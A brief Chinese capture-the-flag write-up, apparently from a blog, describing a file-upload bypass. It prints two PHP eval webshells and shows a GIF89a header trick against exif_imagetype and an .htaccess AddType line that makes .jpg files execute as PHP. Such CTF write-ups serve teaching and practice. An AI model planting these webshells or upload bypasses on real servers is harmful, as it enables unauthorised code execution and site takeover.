文章讲述了在遇到上传安全验证时,如何尝试绕过JS和MITM验证,通过修改文件后缀和利用exif_imagetype函数的验证漏洞,以及使用GIF89a文件头来上传PHP代码。通过上传.htaccess文件改变文件解析方式,最终成功链接shell并获取flag的过程。
一眼看出,上传shell,然后先传一个简单的webshell
<?php eval(@$_POST['password']);?>
果不其然被拦截,然后尝试发现不是js验证,也不是mitm验证,改后缀发现也绕不过,直接改为jpg试试。
回显<? in contents!
那就换个木马试试
<script language='php'>eval($_POST['shell']);<scirpt>
再试试
回显exif_imagetype:not image!
这个函数的绕过就是在加上文件头绕过验证
添加gif文件头GIF89a就能进行绕过
我们要让这个文件作为php代码执行,所以在上传htaccess文件解释。
AddType application/x-httpd-php .jpg
链接shell,拿到flag。
扫一扫
6651
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
